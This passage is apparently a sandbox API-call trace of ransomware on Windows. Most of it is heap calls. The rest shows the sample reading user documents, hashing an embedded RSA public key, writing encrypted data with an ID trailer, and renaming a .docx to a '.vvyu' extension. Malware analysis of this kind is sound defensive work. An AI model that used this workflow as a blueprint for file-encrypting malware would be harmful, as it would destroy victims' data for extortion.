(HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e948 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9a8 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9c0 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e960 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e930 [0184.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d313c0 | out: hHeap=0x6a0000) returned 1 [0184.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.448] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x17c90, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x17c90, lpOverlapped=0x0) returned 1 [0184.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.450] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17c95, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.450] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.451] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.451] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.451] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.451] CloseHandle (hObject=0x584) returned 1 [0184.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0184.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.454] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\1G5yOYkuiK.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\1g5yoykuik.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\1G5yOYkuiK.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\1g5yoykuik.docx.vvyu")) returned 1 [0184.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.456] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.458] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735eb110, ftCreationTime.dwHighDateTime=0x1d8343b, ftLastAccessTime.dwLowDateTime=0x9e01840, ftLastAccessTime.dwHighDateTime=0x1d86295, ftLastWriteTime.dwLowDateTime=0x9e01840, ftLastWriteTime.dwHighDateTime=0x1d86295, nFileSizeHigh=0x0, nFileSizeLow=0x93d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7q92iR26 9wIDTp.pptx", cAlternateFileName="7Q92IR~1.PPT")) returned 1 [0184.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d313c0 [0184.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d313c0 | out: hHeap=0x6a0000) returned 1 [0184.459] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\7q92iR26 9wIDTp.pptx") returned=".pptx" [0184.459] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\7q92iR26 9wIDTp.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\7q92ir26 9widtp.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.460] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=37844) returned 1 [0184.460] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.463] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x93ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.463] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.467] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.467] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x93d4, lpOverlapped=0x0) returned 1 [0184.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.468] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.469] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.470] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.470] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.470] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.470] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.470] GetLastError () returned 0x0 [0184.470] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.470] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.470] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.470] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.470] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x93d0) returned 0x2d43778 [0184.471] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d313c0 [0184.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31408 [0184.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e948 [0184.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.472] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e960 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e948 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.475] GetCurrentThreadId () returned 0x264 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36b08 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.475] 